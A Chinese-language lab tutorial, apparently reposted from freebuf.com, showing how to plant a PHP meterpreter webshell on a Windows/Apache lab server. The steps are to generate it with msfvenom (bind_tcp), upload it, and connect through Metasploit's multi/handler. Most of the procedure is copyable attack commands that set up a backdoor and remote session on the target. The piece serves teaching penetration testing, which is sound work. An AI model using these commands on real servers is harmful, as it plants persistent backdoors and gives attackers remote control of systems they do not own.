webshell脚本操作介绍(4) – 作者:minggege

MSF连接小马

一. 概述

metasploit框架中其实也自带了php的后门,并且配合meterpreter功能强大。

bind_tcp:在这里黑客主动去连接目标主机,就叫作正向连接。适用的情况是服务器在外网的情况
reverse_tcp:在这个例子中反向连接就是被入侵的主机反过来来连接黑客,就叫作反向连接,在目标服务器在内网或有防火墙的情况下使用。

二. 环境

软件 版本 解释
Kali Linux 2019 IP : 10.1.1.220
Windows server 2008 R2 IP : 10.1.1.251
PHPStudy PHP5.4.45-nts+Apache Windows系统中

二. 实验步骤

1. 生成小马

msfvenom -p php/meterpreter/bind_tcp lhost=10.1.1.220 lport=55555 -o msf.php

图片[1]-webshell脚本操作介绍(4) – 作者:minggege-安全小百科

2. 上传至服务器

图片[2]-webshell脚本操作介绍(4) – 作者:minggege-安全小百科

3. 配置Kali管理会话

msfconsole

图片[3]-webshell脚本操作介绍(4) – 作者:minggege-安全小百科use exploit/multi/handler

set payload php/meterpreter/bind_tcp

图片[4]-webshell脚本操作介绍(4) – 作者:minggege-安全小百科set LPORT 55555
set RHOST 10.1.1.251
exploit

图片[5]-webshell脚本操作介绍(4) – 作者:minggege-安全小百科手动在浏览器中浏览小马地址,人为触发连接事件

图片[6]-webshell脚本操作介绍(4) – 作者:minggege-安全小百科连接成功.

图片[7]-webshell脚本操作介绍(4) – 作者:minggege-安全小百科

来源:freebuf.com 2020-09-14 22:58:45 by: minggege

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论